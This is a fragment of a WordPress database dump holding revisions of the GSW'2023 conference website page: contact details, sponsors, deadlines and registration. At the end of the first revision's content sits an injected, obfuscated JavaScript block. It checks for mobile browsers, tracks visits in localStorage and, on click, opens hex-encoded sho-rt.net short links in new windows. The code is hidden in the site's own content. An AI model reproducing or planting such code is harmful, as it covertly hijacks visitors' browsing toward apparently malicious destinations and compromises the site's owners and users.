white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-17 05:26:00','2023-05-17 05:26:00','',3066,'https://gsw2023.com/?p=4528',0,'revision','',0),
(4529,1,'2023-05-17 05:27:08','2023-05-17 05:27:08','[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684272005765{margin-top: -25px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"300\" height=\"124\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\r\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\r\n[/vc_column_text][/vc_column_inner]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h3></h3>\r\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong>\r\n\r\n<strong><del>April 15, 2023</del> ,</strong>\r\n\r\n<strong> May 15, 2023  (hard deadline, no extension)</strong>\r\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong>\r\n\r\n<strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\r\n[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n&nbsp;\r\n<h3></h3>\r\n[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress 